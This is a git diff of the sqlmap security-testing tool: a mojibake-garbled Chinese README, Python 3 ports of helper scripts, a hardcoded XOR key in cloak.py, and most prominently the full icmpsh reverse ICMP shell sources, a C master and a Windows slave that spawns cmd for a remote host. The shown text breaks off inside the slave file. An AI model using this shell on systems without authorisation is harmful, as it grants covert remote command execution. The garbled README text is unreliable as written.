+---- + +ä½ å¯ä»¥ç‚¹å‡» [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包好的æºä»£ç ï¼Œæˆ–者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包好的æºä»£ç . + +推è直接从 [Git](https://github.com/sqlmapproject/sqlmap) ä»“åº“èŽ·å–æœ€æ–°çš„æºä»£ç : + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap å¯ä»¥è¿è¡Œåœ¨ [Python](https://www.python.org/download/) **2.7** å’Œ **3.x** 版本的任何平å°ä¸Š + +使用方法 +---- + +通过如下命令å¯ä»¥æŸ¥çœ‹åŸºæœ¬çš„用法åŠå‘½ä»¤è¡Œå‚æ•°: + + python sqlmap.py -h + +通过如下的命令å¯ä»¥æŸ¥çœ‹æ‰€æœ‰çš„用法åŠå‘½ä»¤è¡Œå‚æ•°: + + python sqlmap.py -hh + +ä½ å¯ä»¥ä»Ž [这里](https://asciinema.org/a/46601) 看到一个 sqlmap 的使用样例。除此以外,你还å¯ä»¥æŸ¥çœ‹ [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)ã€‚èŽ·å– sqlmap 所有支æŒçš„特性ã€å‚æ•°ã€å‘½ä»¤è¡Œé€‰é¡¹å¼€å…³åŠè¯¦ç»†çš„使用帮助。 + +链接 +---- + +* 项目主页: https://sqlmap.org +* æºä»£ç ä¸‹è½½: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commitçš„ RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* 问题跟踪器: https://github.com/sqlmapproject/sqlmap/issues +* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki +* 常è§é—®é¢˜ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* 教程: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/extra/__init__.py b/extra/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/extra/__init__.py +++ b/extra/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/extra/beep/__init__.py b/extra/beep/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/extra/beep/__init__.py +++ b/extra/beep/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/extra/beep/beep.py b/extra/beep/beep.py index a6aacc0f630..9e1acd04b0d 100644 --- a/extra/beep/beep.py +++ b/extra/beep/beep.py @@ -3,12 +3,11 @@ """ beep.py - Make a beep sound -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os -import subprocess import sys import wave @@ -16,11 +15,13 @@ def beep(): try: - if subprocess.mswindows: + if sys.platform.startswith("win"): _win_wav_play(BEEP_WAV_FILENAME) - elif sys.platform == "darwin": - _mac_beep() - elif sys.platform == "linux2": + elif sys.platform.startswith("darwin"): + _mac_wav_play(BEEP_WAV_FILENAME) + elif sys.platform.startswith("cygwin"): + _cygwin_beep(BEEP_WAV_FILENAME) + elif any(sys.platform.startswith(_) for _ in ("linux", "freebsd")): _linux_wav_play(BEEP_WAV_FILENAME) else: _speaker_beep() @@ -35,9 +36,12 @@ def _speaker_beep(): except IOError: pass -def _mac_beep(): - import Carbon.Snd - Carbon.Snd.SysBeep(1) +# Reference: https://lists.gnu.org/archive/html/emacs-devel/2014-09/msg00815.html +def _cygwin_beep(filename): + os.system("play-sound-file '%s' 2>/dev/null" % filename) + +def _mac_wav_play(filename): + os.system("afplay '%s' 2>/dev/null" % BEEP_WAV_FILENAME) def _win_wav_play(filename): import winsound @@ -45,6 +49,10 @@ def _win_wav_play(filename): winsound.PlaySound(filename, winsound.SND_FILENAME) def _linux_wav_play(filename): + for _ in ("paplay", "aplay", "mpv", "mplayer", "play"): + if not os.system("%s '%s' 2>/dev/null" % (_, filename)): + return + import ctypes PA_STREAM_PLAYBACK = 1 @@ -54,7 +62,10 @@ def _linux_wav_play(filename): class struct_pa_sample_spec(ctypes.Structure): _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)] - pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") + try: + pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0") + except OSError: + return wave_file = wave.open(filename, "rb") @@ -70,7 +81,7 @@ class struct_pa_sample_spec(ctypes.Structure): raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error))) while True: - latency = pa.pa_simple_get_latency(pa_stream, error) + latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error)) if latency == -1: raise Exception("Getting latency failed") @@ -78,12 +89,12 @@ class struct_pa_sample_spec(ctypes.Structure): if not buf: break - if pa.pa_simple_write(pa_stream, buf, len(buf), error): + if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)): raise Exception("Could not play file") wave_file.close() - if pa.pa_simple_drain(pa_stream, error): + if pa.pa_simple_drain(pa_stream, ctypes.byref(error)): raise Exception("Could not simple drain") pa.pa_simple_free(pa_stream) diff --git a/extra/cloak/__init__.py b/extra/cloak/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/extra/cloak/__init__.py +++ b/extra/cloak/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/extra/cloak/cloak.py b/extra/cloak/cloak.py index 1725f0ba8ff..641d1c51635 100644 --- a/extra/cloak/cloak.py +++ b/extra/cloak/cloak.py @@ -3,40 +3,45 @@ """ cloak.py - Simple file encryption/compression utility -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import bz2 +from __future__ import print_function + import os +import struct import sys +import zlib from optparse import OptionError from optparse import OptionParser -def hideAscii(data): - retVal = "" - for i in xrange(len(data)): - if ord(data[i]) < 128: - retVal += chr(ord(data[i]) ^ 127) - else: - retVal += data[i] +if sys.version_info >= (3, 0): + xrange = range + ord = lambda _: _ - return retVal +KEY = b"wr36EPIvaR7ZDfb4" -def cloak(inputFile): - f = open(inputFile, 'rb') - data = bz2.compress(f.read()) - f.close() +def xor(message, key): + return b"".join(struct.pack('B', ord(message[i]) ^ ord(key[i % len(key)])) for i in range(len(message))) + +def cloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() - return hideAscii(data) + return xor(zlib.compress(data), KEY) -def decloak(inputFile): - f = open(inputFile, 'rb') +def decloak(inputFile=None, data=None): + if data is None: + with open(inputFile, "rb") as f: + data = f.read() try: - data = bz2.decompress(hideAscii(f.read())) - except: - print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile + data = zlib.decompress(xor(data, KEY)) + except Exception as ex: + print(ex) + print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile) sys.exit(1) finally: f.close() @@ -45,7 +50,7 @@ def decloak(inputFile): def main(): usage = '%s [-d] -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') + parser = OptionParser(usage=usage, version='0.2') try: parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt') @@ -57,11 +62,11 @@ def main(): if not args.inputFile: parser.error('Missing the input file, -h for help') - except (OptionError, TypeError), e: - parser.error(e) + except (OptionError, TypeError) as ex: + parser.error(ex) if not os.path.isfile(args.inputFile): - print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile + print('ERROR: the provided input file \'%s\' is non existent' % args.inputFile) sys.exit(1) if not args.decrypt: diff --git a/extra/dbgtool/__init__.py b/extra/dbgtool/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/extra/dbgtool/__init__.py +++ b/extra/dbgtool/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/extra/dbgtool/dbgtool.py b/extra/dbgtool/dbgtool.py index 69114d51726..7cdb11b70c1 100644 --- a/extra/dbgtool/dbgtool.py +++ b/extra/dbgtool/dbgtool.py @@ -3,13 +3,14 @@ """ dbgtool.py - Portable executable to ASCII debug script converter -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import os import sys -import struct from optparse import OptionError from optparse import OptionParser @@ -19,7 +20,7 @@ def convert(inputFile): fileSize = fileStat.st_size if fileSize > 65280: - print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile + print("ERROR: the provided input file '%s' is too big for debug.exe" % inputFile) sys.exit(1) script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_")) @@ -32,7 +33,7 @@ def convert(inputFile): fileContent = fp.read() for fileChar in fileContent: - unsignedFileChar = struct.unpack("B", fileChar)[0] + unsignedFileChar = fileChar if sys.version_info >= (3, 0) else ord(fileChar) if unsignedFileChar != 0: counter2 += 1 @@ -59,7 +60,7 @@ def convert(inputFile): def main(inputFile, outputFile): if not os.path.isfile(inputFile): - print "ERROR: the provided input file '%s' is not a regular file" % inputFile + print("ERROR: the provided input file '%s' is not a regular file" % inputFile) sys.exit(1) script = convert(inputFile) @@ -70,7 +71,7 @@ def main(inputFile, outputFile): sys.stdout.write(script) sys.stdout.close() else: - print script + print(script) if __name__ == "__main__": usage = "%s -i [-o ]" % sys.argv[0] @@ -86,8 +87,8 @@ def main(inputFile, outputFile): if not args.inputFile: parser.error("Missing the input file, -h for help") - except (OptionError, TypeError), e: - parser.error(e) + except (OptionError, TypeError) as ex: + parser.error(ex) inputFile = args.inputFile outputFile = args.outputFile diff --git a/extra/icmpsh/README.txt b/extra/icmpsh/README.txt index 631f9ee377f..d09e83b8552 100644 --- a/extra/icmpsh/README.txt +++ b/extra/icmpsh/README.txt @@ -1,45 +1,45 @@ -icmpsh - simple reverse ICMP shell - -icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. - - ---- Running the Master --- - -The master is straight forward to use. There are no extra libraries required for the C version. -The Perl master however has the following dependencies: - - * IO::Socket - * NetPacket::IP - * NetPacket::ICMP - - -When running the master, don't forget to disable ICMP replies by the OS. For example: - - sysctl -w net.ipv4.icmp_echo_ignore_all=1 - -If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive -commands send from the master. - - ---- Running the Slave --- - -The slave comes with a few command line options as outlined below: - - --t host host ip address to send ping requests to. This option is mandatory! - --r send a single test icmp request containing the string "Test1234" and then quit. - This is for testing the connection. - --d milliseconds delay between requests in milliseconds - --o milliseconds timeout of responses in milliseconds. If a response has not received in time, - the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. - The counter is set back to 0 if a response was received. - --b num limit of blanks (unanswered icmp requests before quitting - --s bytes maximal data buffer size in bytes - - -In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. +icmpsh - simple reverse ICMP shell + +icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl. + + +--- Running the Master --- + +The master is straight forward to use. There are no extra libraries required for the C version. +The Perl master however has the following dependencies: + + * IO::Socket + * NetPacket::IP + * NetPacket::ICMP + + +When running the master, don't forget to disable ICMP replies by the OS. For example: + + sysctl -w net.ipv4.icmp_echo_ignore_all=1 + +If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive +commands send from the master. + + +--- Running the Slave --- + +The slave comes with a few command line options as outlined below: + + +-t host host ip address to send ping requests to. This option is mandatory! + +-r send a single test icmp request containing the string "Test1234" and then quit. + This is for testing the connection. + +-d milliseconds delay between requests in milliseconds + +-o milliseconds timeout of responses in milliseconds. If a response has not received in time, + the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. + The counter is set back to 0 if a response was received. + +-b num limit of blanks (unanswered icmp requests before quitting + +-s bytes maximal data buffer size in bytes + + +In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer. diff --git a/extra/icmpsh/icmpsh-m.c b/extra/icmpsh/icmpsh-m.c index 32c3edb7429..95deb603bc0 100644 --- a/extra/icmpsh/icmpsh-m.c +++ b/extra/icmpsh/icmpsh-m.c @@ -1,134 +1,134 @@ -/* - * icmpsh - simple icmp command shell - * Copyright (c) 2010, Nico Leidecker - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define IN_BUF_SIZE 1024 -#define OUT_BUF_SIZE 64 - -// calculate checksum -unsigned short checksum(unsigned short *ptr, int nbytes) -{ - unsigned long sum; - unsigned short oddbyte, rs; - - sum = 0; - while(nbytes > 1) { - sum += *ptr++; - nbytes -= 2; - } - - if(nbytes == 1) { - oddbyte = 0; - *((unsigned char *) &oddbyte) = *(u_char *)ptr; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - rs = ~sum; - return rs; -} - -int main(int argc, char **argv) -{ - int sockfd; - int flags; - char in_buf[IN_BUF_SIZE]; - char out_buf[OUT_BUF_SIZE]; - unsigned int out_size; - int nbytes; - struct iphdr *ip; - struct icmphdr *icmp; - char *data; - struct sockaddr_in addr; - - - printf("icmpsh - master\n"); - - // create raw ICMP socket - sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); - if (sockfd == -1) { - perror("socket"); - return -1; - } - - // set stdin to non-blocking - flags = fcntl(0, F_GETFL, 0); - flags |= O_NONBLOCK; - fcntl(0, F_SETFL, flags); - - printf("running...\n"); - while(1) { - - // read data from socket - memset(in_buf, 0x00, IN_BUF_SIZE); - nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1); - if (nbytes > 0) { - // get ip and icmp header and data part - ip = (struct iphdr *) in_buf; - if (nbytes > sizeof(struct iphdr)) { - nbytes -= sizeof(struct iphdr); - icmp = (struct icmphdr *) (ip + 1); - if (nbytes > sizeof(struct icmphdr)) { - nbytes -= sizeof(struct icmphdr); - data = (char *) (icmp + 1); - data[nbytes] = '\0'; - printf("%s", data); - fflush(stdout); - } - - // reuse headers - icmp->type = 0; - addr.sin_family = AF_INET; - addr.sin_addr.s_addr = ip->saddr; - - // read data from stdin - nbytes = read(0, out_buf, OUT_BUF_SIZE); - if (nbytes > -1) { - memcpy((char *) (icmp + 1), out_buf, nbytes); - out_size = nbytes; - } else { - out_size = 0; - } - - icmp->checksum = 0x00; - icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size); - - // send reply - nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr)); - if (nbytes == -1) { - perror("sendto"); - return -1; - } - } - } - } - - return 0; -} - +/* + * icmpsh - simple icmp command shell + * Copyright (c) 2010, Nico Leidecker + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IN_BUF_SIZE 1024 +#define OUT_BUF_SIZE 64 + +// calculate checksum +unsigned short checksum(unsigned short *ptr, int nbytes) +{ + unsigned long sum; + unsigned short oddbyte, rs; + + sum = 0; + while(nbytes > 1) { + sum += *ptr++; + nbytes -= 2; + } + + if(nbytes == 1) { + oddbyte = 0; + *((unsigned char *) &oddbyte) = *(u_char *)ptr; + sum += oddbyte; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + rs = ~sum; + return rs; +} + +int main(int argc, char **argv) +{ + int sockfd; + int flags; + char in_buf[IN_BUF_SIZE]; + char out_buf[OUT_BUF_SIZE]; + unsigned int out_size; + int nbytes; + struct iphdr *ip; + struct icmphdr *icmp; + char *data; + struct sockaddr_in addr; + + + printf("icmpsh - master\n"); + + // create raw ICMP socket + sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); + if (sockfd == -1) { + perror("socket"); + return -1; + } + + // set stdin to non-blocking + flags = fcntl(0, F_GETFL, 0); + flags |= O_NONBLOCK; + fcntl(0, F_SETFL, flags); + + printf("running...\n"); + while(1) { + + // read data from socket + memset(in_buf, 0x00, IN_BUF_SIZE); + nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1); + if (nbytes > 0) { + // get ip and icmp header and data part + ip = (struct iphdr *) in_buf; + if (nbytes > sizeof(struct iphdr)) { + nbytes -= sizeof(struct iphdr); + icmp = (struct icmphdr *) (ip + 1); + if (nbytes > sizeof(struct icmphdr)) { + nbytes -= sizeof(struct icmphdr); + data = (char *) (icmp + 1); + data[nbytes] = '\0'; + printf("%s", data); + fflush(stdout); + } + + // reuse headers + icmp->type = 0; + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = ip->saddr; + + // read data from stdin + nbytes = read(0, out_buf, OUT_BUF_SIZE); + if (nbytes > -1) { + memcpy((char *) (icmp + 1), out_buf, nbytes); + out_size = nbytes; + } else { + out_size = 0; + } + + icmp->checksum = 0x00; + icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size); + + // send reply + nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr)); + if (nbytes == -1) { + perror("sendto"); + return -1; + } + } + } + } + + return 0; +} + diff --git a/extra/icmpsh/icmpsh-m.pl b/extra/icmpsh/icmpsh-m.pl old mode 100755 new mode 100644 diff --git a/extra/icmpsh/icmpsh-s.c b/extra/icmpsh/icmpsh-s.c index 5c127d84320..c108509774d 100644 --- a/extra/icmpsh/icmpsh-s.c +++ b/extra/icmpsh/icmpsh-s.c @@ -1,346 +1,344 @@ -/* - * icmpsh - simple icmp command shell - * Copyright (c) 2010, Nico Leidecker - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - */ - - -#include -#include -#include -#include -#include -#include - -#define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8) - -#define STATUS_OK 0 -#define STATUS_SINGLE 1 -#define STATUS_PROCESS_NOT_CREATED 2 - -#define TRANSFER_SUCCESS 1 -#define TRANSFER_FAILURE 0 - -#define DEFAULT_TIMEOUT 3000 -#define DEFAULT_DELAY 200 -#define DEFAULT_MAX_BLANKS 10 -#define DEFAULT_MAX_DATA_SIZE 64 - -FARPROC icmp_create, icmp_send, to_ip; - -int verbose = 0; - -int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write) -{ - SECURITY_ATTRIBUTES sattr; - STARTUPINFOA si; - HANDLE in_read, out_write; - - memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES)); - memset(pi, 0x00, sizeof(PROCESS_INFORMATION)); - - // create communication pipes - memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES)); - sattr.nLength = sizeof(SECURITY_ATTRIBUTES); - sattr.bInheritHandle = TRUE; - sattr.lpSecurityDescriptor = NULL; - - if (!CreatePipe(out_read, &out_write, &sattr, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - - if (!CreatePipe(&in_read, in_write, &sattr, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - - // spawn process - memset(&si, 0x00, sizeof(STARTUPINFO)); - si.cb = sizeof(STARTUPINFO); - si.hStdError = out_write; - si.hStdOutput = out_write; - si.hStdInput = in_read; - si.dwFlags |= STARTF_USESTDHANDLES; - - if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) { - return STATUS_PROCESS_NOT_CREATED; - } - - CloseHandle(out_write); - CloseHandle(in_read); - - return STATUS_OK; -} - -void usage(char *path) -{ - printf("%s [options] -t target\n", path); - printf("options:\n"); - printf(" -t host host ip address to send ping requests to\n"); - printf(" -r send a single test icmp request and then quit\n"); - printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY); - printf(" -o milliseconds timeout in milliseconds\n"); - printf(" -h this screen\n"); - printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); - printf(" before quitting\n"); - printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE); - printf("In order to improve the speed, lower the delay (-d) between requests or\n"); - printf("increase the size (-s) of the data buffer\n"); -} - -void create_icmp_channel(HANDLE *icmp_chan) -{ - // create icmp file - *icmp_chan = (HANDLE) icmp_create(); -} - -int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout) -{ - int rs; - char *temp_in_buf; - int nbytes; - - PICMP_ECHO_REPLY echo_reply; - - temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE); - if (!temp_in_buf) { - return TRANSFER_FAILURE; - } - - // send data to remote host - rs = icmp_send( - icmp_chan, - target, - out_buf, - out_buf_size, - NULL, - temp_in_buf, - max_in_data_size + ICMP_HEADERS_SIZE, - timeout); - - // check received data - if (rs > 0) { - echo_reply = (PICMP_ECHO_REPLY) temp_in_buf; - if (echo_reply->DataSize > max_in_data_size) { - nbytes = max_in_data_size; - } else { - nbytes = echo_reply->DataSize; - } - memcpy(in_buf, echo_reply->Data, nbytes); - *in_buf_size = nbytes; - - free(temp_in_buf); - return TRANSFER_SUCCESS; - } - - free(temp_in_buf); - - return TRANSFER_FAILURE; -} - -int load_deps() -{ - HMODULE lib; - - lib = LoadLibraryA("ws2_32.dll"); - if (lib != NULL) { - to_ip = GetProcAddress(lib, "inet_addr"); - if (!to_ip) { - return 0; - } - } - - lib = LoadLibraryA("iphlpapi.dll"); - if (lib != NULL) { - icmp_create = GetProcAddress(lib, "IcmpCreateFile"); - icmp_send = GetProcAddress(lib, "IcmpSendEcho"); - if (icmp_create && icmp_send) { - return 1; - } - } - - lib = LoadLibraryA("ICMP.DLL"); - if (lib != NULL) { - icmp_create = GetProcAddress(lib, "IcmpCreateFile"); - icmp_send = GetProcAddress(lib, "IcmpSendEcho"); - if (icmp_create && icmp_send) { - return 1; - } - } - - printf("failed to load functions (%u)", GetLastError()); - - return 0; -} -int main(int argc, char **argv) -{ - int opt; - char *target; - unsigned int delay, timeout; - unsigned int ip_addr; - HANDLE pipe_read, pipe_write; - HANDLE icmp_chan; - unsigned char *in_buf, *out_buf; - unsigned int in_buf_size, out_buf_size; - DWORD rs; - int blanks, max_blanks; - PROCESS_INFORMATION pi; - int status; - unsigned int max_data_size; - struct hostent *he; - - - // set defaults - target = 0; - timeout = DEFAULT_TIMEOUT; - delay = DEFAULT_DELAY; - max_blanks = DEFAULT_MAX_BLANKS; - max_data_size = DEFAULT_MAX_DATA_SIZE; - - status = STATUS_OK; - if (!load_deps()) { - printf("failed to load ICMP library\n"); - return -1; - } - - // parse command line options - for (opt = 1; opt < argc; opt++) { - if (argv[opt][0] == '-') { - switch(argv[opt][1]) { - case 'h': - usage(*argv); - return 0; - case 't': - if (opt + 1 < argc) { - target = argv[opt + 1]; - } - break; - case 'd': - if (opt + 1 < argc) { - delay = atol(argv[opt + 1]); - } - break; - case 'o': - if (opt + 1 < argc) { - timeout = atol(argv[opt + 1]); - } - break; - case 'r': - status = STATUS_SINGLE; - break; - case 'b': - if (opt + 1 < argc) { - max_blanks = atol(argv[opt + 1]); - } - break; - case 's': - if (opt + 1 < argc) { - max_data_size = atol(argv[opt + 1]); - } - break; - default: - printf("unrecognized option -%c\n", argv[1][0]); - usage(*argv); - return -1; - } - } - } - - if (!target) { - printf("you need to specify a host with -t. Try -h for more options\n"); - return -1; - } - ip_addr = to_ip(target); - - // don't spawn a shell if we're only sending a single test request - if (status != STATUS_SINGLE) { - status = spawn_shell(&pi, &pipe_read, &pipe_write); - } - - // create icmp channel - create_icmp_channel(&icmp_chan); - if (icmp_chan == INVALID_HANDLE_VALUE) { - printf("unable to create ICMP file: %u\n", GetLastError()); - return -1; - } - - // allocate transfer buffers - in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); - out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); - if (!in_buf || !out_buf) { - printf("failed to allocate memory for transfer buffers\n"); - return -1; - } - memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); - memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); - - // sending/receiving loop - blanks = 0; - do { - - switch(status) { - case STATUS_SINGLE: - // reply with a static string - out_buf_size = sprintf(out_buf, "Test1234\n"); - break; - case STATUS_PROCESS_NOT_CREATED: - // reply with error message - out_buf_size = sprintf(out_buf, "Process was not created\n"); - break; - default: - // read data from process via pipe - out_buf_size = 0; - if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) { - if (out_buf_size > 0) { - out_buf_size = 0; - rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL); - if (!rs && GetLastError() != ERROR_IO_PENDING) { - out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError()); - } - } - } else { - out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError()); - } - break; - } - - // send request/receive response - if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) { - if (status == STATUS_OK) { - // write data from response back into pipe - WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0); - } - blanks = 0; - } else { - // no reply received or error occured - blanks++; - } - - // wait between requests - Sleep(delay); - - } while (status == STATUS_OK && blanks < max_blanks); - - if (status == STATUS_OK) { - TerminateProcess(pi.hProcess, 0); - } - - return 0; -} - +/* + * icmpsh - simple icmp command shell + * Copyright (c) 2010, Nico Leidecker + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + */ + + +#include +#include +#include +#include +#include +#include + +#define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8) + +#define STATUS_OK 0 +#define STATUS_SINGLE 1 +#define STATUS_PROCESS_NOT_CREATED 2 + +#define TRANSFER_SUCCESS 1 +#define TRANSFER_FAILURE 0 + +#define DEFAULT_TIMEOUT 3000 +#define DEFAULT_DELAY 200 +#define DEFAULT_MAX_BLANKS 10 +#define DEFAULT_MAX_DATA_SIZE 64 + +FARPROC icmp_create, icmp_send, to_ip; + +int verbose = 0; + +int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write) +{ + SECURITY_ATTRIBUTES sattr; + STARTUPINFOA si; + HANDLE in_read, out_write; + + memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES)); + memset(pi, 0x00, sizeof(PROCESS_INFORMATION)); + + // create communication pipes + memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES)); + sattr.nLength = sizeof(SECURITY_ATTRIBUTES); + sattr.bInheritHandle = TRUE; + sattr.lpSecurityDescriptor = NULL; + + if (!CreatePipe(out_read, &out_write, &sattr, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 